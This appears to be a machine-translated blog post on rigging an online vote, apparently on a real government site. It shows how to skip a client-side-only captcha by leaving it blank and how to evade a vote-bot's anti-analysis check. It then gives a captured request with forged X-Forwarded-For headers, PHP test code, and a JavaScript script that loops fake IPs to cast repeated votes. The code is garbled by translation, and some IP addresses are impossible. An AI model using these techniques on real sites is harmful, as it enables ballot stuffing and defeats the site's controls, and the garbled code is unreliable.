Voting website analysis and counterfeit IP technology

Recently, a friend needs a voting software. I recently studied this website, which has a verification code and each IP address is limited to one vote. It looks like a standard voting website. I first studied the verification code:

The verification code of this voting website is easy to start with. The four numbers in the standard location are well recognized. After that, the number of digits is not necessarily abnormal, and there are still letters, and the location is not necessarily up or down. The verification code is not only difficult to identify by software, but even hard to recognize by manual. There is no way to break down the mountains and waters!

I found a vulnerability in his verification code check through continuous analysis and research, and found this vulnerability. This verification code is essentially a false one. It does not need to be identified, and no verification code is required, because he only sets js to check whether the verification code is empty on the voting option pageCodeThe JS Code runs on the client. The effect of this verification is zero. Generally, JavaScript is used only for convenience. As a voting website, only this verification method is used, on the dynamic page of voting processing, I did not check whether the verification code is empty. I am not sure to compliment it. This poses a huge risk to the security of the website.

I have learned how to crack the verification code. As long as the verification code file is not directly accessed during voting, the verification code is blank, since his dynamic page does not check whether the verification code is empty, you only need to leave the verification code parameter blank during post.

Another problem is that the voting website checks the IP address and limits an IP address to only allow voting once. This can be achieved only by using a proxy or through network disconnection and dialing. I really can't think of other good methods. Later, this friend found a one that can quickly vote on this website.ProgramI'm curious about the IP address solution of this program and ask my friends for an analysis.

First, I took the packet capture method for this voting software for research. After preparing, I opened the voting program and "click it! Prompt software conflict !" Dizzy, no, so I will turn off some programs and leave only one package capture program after it is closed, prompting for conflicts. Haha, the program actually knows that someone may analyze his software, the system traverses the process name and checks whether a suspicious program exists. If a program analyzes or captures packets, the system rejects the program. Well, I know that the software he restricts includes easy language programming software and wsockexpert_cn packet capture software. Hehe turned off the easy language and changed the wsockexpert_cn name to pass the software's own security detection and run successfully.

Which of the following is the data packet I voted for during use: Post/vote/view. php? SID = 33 & amp; Act = vote http/1.1
Accept :*/*
Referer: http://www.qdnfy.gov.cn/vote/vote.php
Content-Type: Application/X-WWW-form-urlencoded
X-forwarded-for: 218.20.218.200
Client_ip: 218.415218.200
Via: 218.425218.200
Remote_addr: 218.426218.200
Accept-language: ZH-CN
Accept-encoding: Text
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Server Load balancer;. Net CLR 2.0.50727;. Net CLR 3.0.04506)
HOST: www.qdnfy.gov.cn
COOKIE: PHPSESSID = pldjnb6scereodjm5niqb9q990
Content-Length: 49
Connection: Close

X-forwarded-for found that the HTTP header parameter is followed by an IP address. Haha, this parameter must have a header. I never knew it. Haha, hurry up and Baidu.

The following is a description of BaiduArticleWell, let's take a look.

Forge the X-forwarded-for field in the HTTP header to forge the IP address
Baidu has gone through the principle of X-forwarded-for, which has been around for a long time.
X-forwarded-for: the xFF header, which represents the real IP address of the client, that is, the HTTP request end. This header is added only when the HTTP proxy or Server Load balancer is passed.
It is not the standard request header information defined in RFC. You can find this item in the Squid cache proxy server development documentation.
The standard format is as follows:
X-forwarded-for: Client1, proxy1, proxy2
From the standard format, we can see that the X-forwarded-for header information can be multiple, separated by commas (,). The first item is the real client IP address, the rest is the IP address of the proxy or Server Load balancer that has been used before. Several IP addresses will appear after several IP addresses.
Wiki's X-forwarded-for interpretation http://en.wikipedia.org/wiki/X-Forwarded-For
Analysis:
Since the Client IP address is forged, Let's first look at how to obtain the Client IP address (take PHP for example). This code is found in Baidu. This code may be used by most websites.

<? PHP
$ User_ip = ($ _ server ["http_via"])? // Whether a proxy is used
$ _ Server ["http_x_forwarded_for"]: $ _ server ["remote_addr"];
// If the retrieval fails, it will be obtained from remote_addr.
$ User_ip = ($ user_ip )? $ User_ip: $ _ server ["remote_addr"];
?>
First, determine whether the http_via header exists. The http_via header indicates whether the proxy server is used. if not, obtain the Client IP address from the remote_addr field. If yes, obtain the Client IP address from X-forwarded-.
I guess many programmers use code from Baidu. asp is similar.
Then let's test it.
Server code:

<? PHP
// Output http_x_forwarded_for
Echo "http_x_forwarded_for:". $ _ server ["http_x_forwarded_for"];
// Output remote_addr echo "remote_addr:". $ _ server ["remote_addr"];
?>

The obtained Client IP address is different. remote_addr is the real IP address.
Therefore, if a website uses X-forwarded-for to determine the IP address of the client, we can use this logic vulnerability to review the ticket.
Demo address: http://87year.info/t00ls/vote/index.html (right-click to view all client source code)

Client code:
<SCRIPT>
Function createxmlhttp (){
VaR XMLHTTP = false; // create a new variable and assign a value of false. If false is used as the judgment condition, the XMLHTTPRequest object has not been created.
Try {
XMLHTTP = new XMLHttpRequest (); // try to create an XMLHTTPRequest object. all browsers except ie support this method.
} Catch (e ){
Try {
XMLHTTP = activexobject ("msxml12.xmlhttp"); // use a newer version of IE to create an ie-compatible object (msxml2.xmlhttp ).
} Catch (e ){
Try {
XMLHTTP = activexobject ("Microsoft. XMLHTTP"); // use older ie versions to create ie-compatible objects (Microsoft. XMLHTTP ).
} Catch (failed ){
XMLHTTP = false; // keep it false if it fails.
}
}
}
Return XMLHTTP;
}
VaR g_ I = 0;
Function $ (OBJ ){
Return document. getelementbyid (OBJ );
}
Function onsearch ()
{
VaR g_xmlhttp = createxmlhttp ();
If (g_xmlhttp = false)
{
Alert ("your browser does not support Ajax ");
Return;
}
VaR senddata = "Bid =" + $ ("ID"). value;
VaR fakeip = $ ("ip"). Value + g_ I;
// Alert (fakeip); return;
G_xmlhttp.open ("Post", "http: // 192.168.15.166/IP. php", true );
G_xmlhttp.setrequestheader ("Content-Length", senddata. Length );
G_xmlhttp.setrequestheader ("Content-Type", "application/X-WWW-form-urlencoded ");
G_xmlhttp.setrequestheader ("X-forwarded-for", fakeip );
G_xmlhttp.onreadystatechange = function (){
If (/* g_xmlhttp.status = 200 */g_xmlhttp.readystate = 4)
{
$ ("Res"). innerhtml + = g_xmlhttp.responsetext + "</BR> ";
If (++ g_ I <5)
{
SetTimeout ("onsearch ()", 1000 );
}
}
}
G_xmlhttp.send (senddata );
}
</SCRIPT>
<Form name = "form1" method = "Post" Action = "" id = "form1">
<Div>
<Br/>
IP address: <input id = "ip" type = "text" value = "200.156.4."/> </BR>
Voting ID: <input id = "ID" type = "text" value = "232"/> </BR>
<Input id = "Search" type = "button" value = "start"/>
<Br/>
<Br/>
<Span id = "res"> </span>
<Br/>
<Br/>
</Div>
</Form>